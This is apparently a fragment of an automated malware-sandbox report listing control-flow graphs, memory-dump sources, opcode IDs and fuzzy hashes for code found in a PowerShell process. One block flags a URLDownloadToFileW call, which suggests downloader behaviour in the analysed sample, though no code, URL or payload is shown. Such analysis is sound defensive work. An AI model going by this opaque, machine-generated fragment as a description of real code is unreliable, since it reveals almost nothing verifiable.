7fe89ab0de0-7fe89ab0ded 115->120 116->115 121 7fe89ab0e09-7fe89ab0e70 120->121 122 7fe89ab0def-7fe89ab0dff 120->122 121->3 127 7fe89ab0e76-7fe89ab0e83 121->127 122->121 123 7fe89ab0e01-7fe89ab0e02 122->123 123->121 128 7fe89ab0e85-7fe89ab0e95 127->128 129 7fe89ab0e9f-7fe89ab0f0a 127->129 128->129 130 7fe89ab0e97-7fe89ab0e98 128->130 130->129
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.535186747.000007FE89AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7fe89ab0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xF
                                                              • API String ID: 0-2593032537
                                                              • Opcode ID: 43664b54c229d63c74dd706975c013ea93dbc989d324e5a9e792be4a43e971ec
                                                              • Instruction ID: 42ec465855fb10ed944f6d94a9ba98adb4c4c0b28dee78a2db1f51d3c9daa097
                                                              • Opcode Fuzzy Hash: 43664b54c229d63c74dd706975c013ea93dbc989d324e5a9e792be4a43e971ec
                                                              • Instruction Fuzzy Hash: BB72E530A0CB894FDB59EB2C9494B657BE1EF6A744F1801EED44EC72A3DA24EC45C781

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 133 7fe899e59e1-7fe899e59ef 134 7fe899e59f2-7fe899e5a05 133->134 135 7fe899e59f1 133->135 136 7fe899e5a08-7fe899e5a19 134->136 137 7fe899e5a07 134->137 135->134 138 7fe899e5a1c-7fe899e5aa1 136->138 139 7fe899e5a1b 136->139 137->136 143 7fe899e5aab-7fe899e5ab1 138->143 144 7fe899e5aa3-7fe899e5aa8 138->144 139->138 145 7fe899e5abb-7fe899e5afe URLDownloadToFileW 143->145 146 7fe899e5ab3-7fe899e5ab8 143->146 144->143 147 7fe899e5b06-7fe899e5b23 145->147 148 7fe899e5b00 145->148 146->145 148->147
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.535111011.000007FE899E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7fe899e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID: DownloadFile
                                                              • String ID:
                                                              • API String ID: 1407266417-0
                                                              • Opcode ID: 37154260fca38ab3ba2865b30d9d8345ff11262f36f496a31d61b4f92617f1c8
                                                              • Instruction ID: 8eb19c800a319013869f09b449a6657091958337fc141b045b03c5cf24152f48
                                                              • Opcode Fuzzy Hash: 37154260fca38ab3ba2865b30d9d8345ff11262f36f496a31d61b4f92617f1c8
                                                              • Instruction Fuzzy Hash: 8641E27190DB889FDB19DB6898447E9BBF0FB56321F04826FD089D3162CB646806C782

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 159 7fe89ab1100-7fe89ab1124 161 7fe89ab112a-7fe89ab119e 159->161 162 7fe89ab11c1-7fe89ab11cb 159->162 172 7fe89ab11a6-7fe89ab11be 161->172 163 7fe89ab11cd-7fe89ab11d7 162->163 164 7fe89ab11d8-7fe89ab11e8 162->164 165 7fe89ab11ea-7fe89ab11ee 164->165 166 7fe89ab11f5-7fe89ab121a 164->166 165->166
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.535186747.000007FE89AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7fe89ab0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xF
                                                              • API String ID: 0-2593032537
                                                              • Opcode ID: c17dd57b700f8e5bc6ab9ff88213648f8caffbf84c2e2ed2b777d702f761aac7
                                                              • Instruction ID: a40199a05d32e42ec6373afabcaa4f15e3ab23e6c5888282d92eddba7c9aec77
                                                              • Opcode Fuzzy Hash: c17dd57b700f8e5bc6ab9ff88213648f8caffbf84c2e2ed2b777d702f761aac7
                                                              • Instruction Fuzzy Hash: 8521E40070DBCA0FE38B937C1954261BFD2EF5B258B2900EBE98EDB2A3D8044C658361

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 173 7fe89ab2cd9-7fe89ab2d89 174 7fe89ab326d-7fe89ab3326 173->174 175 7fe89ab2d8f-7fe89ab2d99 173->175 176 7fe89ab2d9b-7fe89ab2da8 175->176 177 7fe89ab2db2-7fe89ab2db9 175->177 176->177 181 7fe89ab2daa-7fe89ab2db0 176->181 178 7fe89ab2dbb-7fe89ab2dce 177->178 179 7fe89ab2dd0 177->179 182 7fe89ab2dd2-7fe89ab2dd4 178->182 179->182 181->177 183 7fe89ab2dda-7fe89ab2de6 182->183 184 7fe89ab31e8-7fe89ab31f2 182->184 183->174 187 7fe89ab2dec-7fe89ab2df6 183->187 188 7fe89ab31f4-7fe89ab3204 184->188 189 7fe89ab3205-7fe89ab3215 184->189 192 7fe89ab2df8-7fe89ab2e05 187->192 193 7fe89ab2e12-7fe89ab2e22 187->193 190 7fe89ab3217-7fe89ab321b 189->190 191 7fe89ab3222-7fe89ab326c 189->191 190->191 192->193 195 7fe89ab2e07-7fe89ab2e10 192->195 193->184 200 7fe89ab2e28-7fe89ab2e5c 193->200 195->193 200->184 205 7fe89ab2e62-7fe89ab2e6e 200->205 205->174 206 7fe89ab2e74-7fe89ab2e7e 205->206 207 7fe89ab2e97-7fe89ab2e9c 206->207 208 7fe89ab2e80-7fe89ab2e8d 206->208 207->184 210 7fe89ab2ea2-7fe89ab2ea7 207->210 208->207 209 7fe89ab2e8f-7fe89ab2e95 208->209 209->207 210->184 211 7fe89ab2ead-7fe89ab2eb2 210->211 211->184 213 7fe89ab2eb8-7fe89ab2ec7 211->213 214 7fe89ab2ed7 213->214 215 7fe89ab2ec9-7fe89ab2ed3 213->215 218 7fe89ab2edc-7fe89ab2ee9 214->218 216 7fe89ab2ef3-7fe89ab2f7e 215->216 217 7fe89ab2ed5 215->217 225 7fe89ab2f92-7fe89ab2fb4 216->225 226 7fe89ab2f80-7fe89ab2f8b 216->226 217->218 218->216 219 7fe89ab2eeb-7fe89ab2ef1 218->219 219->216 227 7fe89ab2fb6-7fe89ab2fc0 225->227 228 7fe89ab2fc4 225->228 226->225 229 7fe89ab2fc2 227->229 230 7fe89ab2fe0-7fe89ab306e 227->230 231 7fe89ab2fc9-7fe89ab2fd6 228->231 229->231 238 7fe89ab3082-7fe89ab30a0 230->238 239 7fe89ab3070-7fe89ab307b 230->239 231->230 232 7fe89ab2fd8-7fe89ab2fde 231->232 232->230 240 7fe89ab30a2-7fe89ab30ac 238->240 241 7fe89ab30b0 238->241 239->238 242 7fe89ab30cd-7fe89ab315d 240->242 243 7fe89ab30ae 240->243 244 7fe89ab30b5-7fe89ab30c3 241->244 251 7fe89ab315f-7fe89ab316a 242->251 252 7fe89ab3171-7fe89ab31ca 242->252 243->244 244->242 245 7fe89ab30c5-7fe89ab30cb 244->245 245->242 251->252 255 7fe89ab31d2-7fe89ab31e7 252->255
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.535186747.000007FE89AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7fe89ab0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49b85e602ac70370b73a42fa4d0d6447d21461c4ad49e54b5493fc90654ee8a5
                                                              • Instruction ID: d91384c3896cc3cf3a64097315c354c1f6d1bc34d439cb6b332695e6a4d58e9e
                                                              • Opcode Fuzzy Hash: 49b85e602ac70370b73a42fa4d0d6447d21461c4ad49e54b5493fc90654ee8a5
                                                              • Instruction Fuzzy Hash: 74222630A0CB894FE799EB2C94546787BE2FF99344F2441EED44EC72A3DA25AC16C741
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.535186747.000007FE89AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7fe89ab0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e9f51defca06d4032a82bb5bb77407644ca1784c704dbee148e3c08d154849b2
                                                              • Instruction ID: 31609ff1c119d0e4d3e326ac71005bbf25a6384c3b681885351207e7ece98ebc
                                                              • Opcode Fuzzy Hash: e9f51defca06d4032a82bb5bb77407644ca1784c704dbee148e3c08d154849b2
                                                              • Instruction Fuzzy Hash: E2B22630A0CB894FE759EB2894916797BE1EF56784F1401EED48ED71A3DA24FC46C381
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.535186747.000007FE89AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7fe89ab0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d8a9b9ec517bc75617a74eceb7a83cb01560e0426830041a28aaf7c3465d352
                                                              • Instruction ID: ef86c4569fbd0f4727d0d96c98bef4593098f98c8fb4982a3ac013f45792602d
                                                              • Opcode Fuzzy Hash: 5d8a9b9ec517bc75617a74eceb7a83cb01560e0426830041a28aaf7c3465d352
                                                              • Instruction Fuzzy Hash: 04020120A0DBC90FEB56A73858247B97FE1EF57294F1901EBD48DC71A3DA18AC16C391